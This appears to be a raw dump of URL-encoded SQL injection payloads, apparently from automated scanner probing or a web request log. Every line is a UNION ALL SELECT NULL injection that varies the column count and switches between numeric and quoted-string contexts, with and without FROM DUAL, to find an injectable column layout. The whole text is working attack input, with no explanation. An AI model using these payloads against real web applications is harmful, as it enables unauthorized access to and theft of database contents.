1%20%2B%20%28SELECT%208247%20FROM%20DUAL%20WHERE%205924%3D5924%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%204176%20FROM%20DUAL%20WHERE%201859%3D1859%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%208053%20FROM%20DUAL%20WHERE%204624%3D4624%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%203575%20FROM%20DUAL%20WHERE%207377%3D7377%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%203314%20FROM%20DUAL%20WHERE%203360%3D3360%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%206760%20FROM%20DUAL%20WHERE%209773%3D9773%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%205339%20WHERE%209885%3D9885%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%204479%20WHERE%207518%3D7518%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%207999%20WHERE%207164%3D7164%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202987%20WHERE%203508%3D3508%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%209691%20WHERE%209373%3D9373%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%208681%20WHERE%206938%3D6938%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%201476%20WHERE%208693%3D8693%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202595%20WHERE%205383%3D5383%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%209554%20WHERE%205324%3D5324%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202206%20WHERE%208118%3D8118%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%27%20%2B%20%28SELECT%20%27WTSc%27%20FROM%20DUAL%20WHERE%208753%3D8753%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27eiWU%27%20FROM%20DUAL%20WHERE%201410%3D1410%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ruZx%27%20FROM%20DUAL%20WHERE%206916%3D6916%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27YIJE%27%20FROM%20DUAL%20WHERE%209106%3D9106%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27WiPE%27%20FROM%20DUAL%20WHERE%207780%3D7780%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27EnSY%27%20FROM%20DUAL%20WHERE%202535%3D2535%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27dfjU%27%20FROM%20DUAL%20WHERE%202781%3D2781%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27cJeq%27%20FROM%20DUAL%20WHERE%207724%3D7724%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27AKrs%27%20FROM%20DUAL%20WHERE%206132%3D6132%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27asTN%27%20FROM%20DUAL%20WHERE%206185%3D6185%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27TlgJ%27%20WHERE%208321%3D8321%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27xzYJ%27%20WHERE%207723%3D7723%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27bYjS%27%20WHERE%205375%3D5375%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ldcE%27%20WHERE%201485%3D1485%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Rrhe%27%20WHERE%204183%3D4183%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27zbqL%27%20WHERE%207322%3D7322%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Vrej%27%20WHERE%207470%3D7470%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27DNdL%27%20WHERE%203311%3D3311%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 